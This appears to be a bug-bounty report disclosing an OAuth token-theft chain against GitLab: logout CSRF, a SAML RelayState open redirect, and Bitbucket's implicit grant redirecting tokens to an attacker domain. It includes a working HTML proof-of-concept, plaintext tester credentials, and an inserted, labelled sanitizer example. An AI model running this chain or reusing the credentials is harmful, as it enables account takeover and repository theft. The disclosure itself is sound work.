Hi,
I have found an issue which can be used by an attacker to steal the Bitbucket access token along with other third-party access tokens (Google, Salesforce, etc.). But the most important one is Bitbucket.
gitlab.com/user/sign_in, he is automatically sent to the redirect {F2260468}
This chain can be used to steal third-party access tokens for login with Google, GitHub, Bitbucket, Twitter, Salesforce, etc.,
but we will focus on Bitbucket for the following reason:
it has pre-saved OAuth scopes which are wide, and the client ID is the same as the one used by the "import project from Bitbucket" feature:
{F2260558}
Scope: (read access to all data in the account and some write access, projects' wikis):
{F2260561}
The case is similar for GitHub, but GitHub doesn't allow implicit grant.
This simply returns the access token as a bearer token to the attacker's domain, which can be used to access the full Bitbucket API.
This makes both groups of users vulnerable:
people who chose to log in with Bitbucket;
people who chose other means of login, but have previously imported a project from Bitbucket into GitLab.
Make sure you have previously used Bitbucket with GitLab, whether for login with Bitbucket or for importing a project.
Here are my credentials for triage purposes (please note I will revoke these credentials upon triage; let me know if you need them longer or don't need them at all):
https://bugcrowd-iambull-2.oktapreview.com/
username: [email protected]
password: Gliatb4passtbx!
security answer: Gliatb
Log the victim out with logout CSRF.
Use the SAML creds to save the open redirect for the victim.
Token:
GET /2.0/repositories/%7B766210f9-9bec-4010-9f4d-917b06661c0c%7D HTTP/2
Host: api.bitbucket.org
User-Agent: curl/7.79.1
Accept: */*
Authorization: Bearer Txpo3AXXQZHlp....
Here is the PoC for doing everything step by step; please note all this can be automated with window.open for a 1-click exploit.
<html>
<title>GitLab</title>
<body>
<span>Logout of gitlab if logged in:</span>
<form action="https://gitlab.com/users/sign_out" target="_blank" method="post"><button>Logout Gitlab Account</button></form>
<br>
<br>
<br>
<br>
<span>Open redirect via SAML:</span>
<form action="https://bugcrowd-iambull-2.oktapreview.com/app/bugcrowd-iambull-2_gitlabcom_1/exk1lit3jovMjvewh0h8/sso/saml" target="_blank" method="get">
<input type="hidden" name="RelayState" value=".witcoat.com" />
<button>Save Open Redirect</button></form>
<br>
<span>steal oauth access Token For Bitbucket:</span>
<form action="https://bitbucket.org/site/oauth2/authorize" target="_blank" method="get">
<input type="hidden" name="client_id" value="b9jLmh8WCLZPBAwWba" />
<input type="hidden" name="redirect_uri" value="https://gitlab.com/users/auth/bitbucket/callback" />
<input type="hidden" name="response_type" value="token" />
<input type="hidden" name="state" value="Doesnotmatter" />
<button>Steal Bitbucket Code</button>
</form>
</body>
</html>
Here is the video of going through the steps:
{F2260621}
Upon saving the open redirect into the cookies, when the user clicks sign-in on about.gitlab.com
he will be redirected to an external domain to steal credentials:
{F2260648}
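The GitLab-side weakness in this chain is that a SAML RelayState such as ".witcoat.com" is stored and later honoured as a post-login redirect. As an added illustration of the mitigation (example code, not from the report or from GitLab), here is a RelayState sanitizer that accepts only site-local absolute paths and falls back to a safe default for everything else; the function name and the "/" fallback are assumptions.

```python
from urllib.parse import urlsplit

# Hypothetical sanitizer for a SAML RelayState (or any "return to" value)
# applied before the value is stored in the session and later used as a
# post-login redirect. Example code, not GitLab's; "/" is an assumed fallback.

def sanitize_relay_state(value: str, fallback: str = "/") -> str:
    """Return `value` only if it is a site-local absolute path, else `fallback`."""
    if not value or len(value) > 2048:
        return fallback
    # Control characters and whitespace confuse both urlsplit and browsers.
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in value):
        return fallback
    # Reject anything that carries its own scheme or host: "https://evil",
    # "//evil", "javascript:..." and backslash forms (browsers treat "\" as "/").
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or "\\" in value:
        return fallback
    # Require exactly one leading "/" so host-like strings such as
    # ".witcoat.com" or "witcoat.com/login" cannot be stored as a redirect.
    if not value.startswith("/") or value.startswith("//"):
        return fallback
    return value

if __name__ == "__main__":
    # Constructed candidates, including the RelayState value from the PoC above.
    for candidate in ["/dashboard/projects", ".witcoat.com", "//witcoat.com",
                      "https://witcoat.com/", "/\\witcoat.com", "javascript:alert(1)"]:
        print(f"{candidate!r:28} -> {sanitize_relay_state(candidate)!r}")
```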
Please let me know if you need any more information or if I missed something.
thanks
Bull
Steal the Bitbucket access token, which can be used to import any of the victim's repositories, and also gives write access to any of the victim's wikis in Bitbucket;
this can also be used to steal access tokens for other providers such as Google, Salesforce, Twitter, etc.;
this can also be used to phish users.